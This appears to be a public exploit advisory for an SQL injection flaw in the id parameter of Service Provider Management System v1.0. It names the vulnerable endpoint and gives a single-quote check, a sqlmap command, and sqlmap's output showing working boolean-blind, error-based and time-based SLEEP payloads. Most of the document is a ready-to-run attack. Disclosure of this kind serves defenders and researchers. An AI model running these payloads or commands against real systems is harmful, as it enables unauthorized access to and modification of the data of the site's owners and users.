Service Provider Management System v1.0 Exploit, SQL Injection

# Exploit Title: Service Provider Management System v1.0 - SQL Injection
# Date: 2023-05-23
# Exploit Author: Ashik Kunjumon
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows/Linux

1. Description:

Service Provider Management System v1.0 allows SQL Injection via ID
parameter in /php-spms/?page=services/view&id=2
Exploiting this issue could allow an attacker to compromise the
application, access or modify data,
or exploit the latest vulnerabilities in the underlying database.

Endpoint: /php-spms/?page=services/view&id=2

Vulnerable parameter: id (GET)

2. Proof of Concept:

Step 1 - By visiting the url:
http://localhost/php-spms/?page=services/view&id=2 just add single quote to
verify the SQL Injection.
Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"
-p id --dbms=mysql

SQLMap Response:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT
(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view&id=1' AND (SELECT 1072 FROM
(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

All rights reserved 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD